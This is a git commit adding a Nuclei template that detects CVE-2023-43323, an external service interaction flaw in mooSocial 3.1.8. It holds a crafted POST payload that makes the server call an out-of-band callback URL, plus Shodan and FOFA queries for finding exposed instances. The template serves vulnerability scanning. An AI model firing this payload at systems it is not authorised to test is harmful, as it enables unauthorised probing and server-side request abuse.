Merge pull request #10440 from projectdiscovery/CVE-2023-43323

Create CVE-2023-43323.yaml
2024-08-01 15:23:28 +05:30 · 2024-08-01 15:23:28 +05:30 · 1fef1b0cef
parent 7c71421f7b ce44fd5a70
commit 1fef1b0cef
1 changed files with 63 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-43323.yaml
+++ b/http/cves/2023/CVE-2023-43323.yaml
@ -0,0 +1,63 @@
+id: CVE-2023-43323
+
+info:
+  name: mooSocial 3.1.8 - External Service Interaction
+  author: ritikchaddha
+  severity: medium
+  description: |
+    mooSocial 3.1.8 is vulnerable to external service interaction via multiple parameters in the post function.
+  impact: |
+    An attacker can exploit this vulnerability to interact with external services.
+  remediation: |
+    Upgrade to a patched version of mooSocial to mitigate CVE-2023-43323.
+  reference:
+    - https://github.com/ahrixia/CVE-2023-43323
+    - https://github.com/nomi-sec/PoC-in-GitHub
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-43323
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2023-43323
+    epss-score: 0.00046
+    epss-percentile: 0.15636
+    cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: moosocial
+    product: moostore
+    shodan-query: http.favicon.hash:702863115clear
+    fofa-query:
+      - mooSocial
+      - moosocial
+      - icon_hash="702863115"
+    tags: cve,cve2023,moosocial,oast
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "mooConfig"
+        internal: true
+
+  - raw:
+      - |
+        POST /activities/ajax_share HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        [data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http://{{interactsh-url}}%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+          - "dns"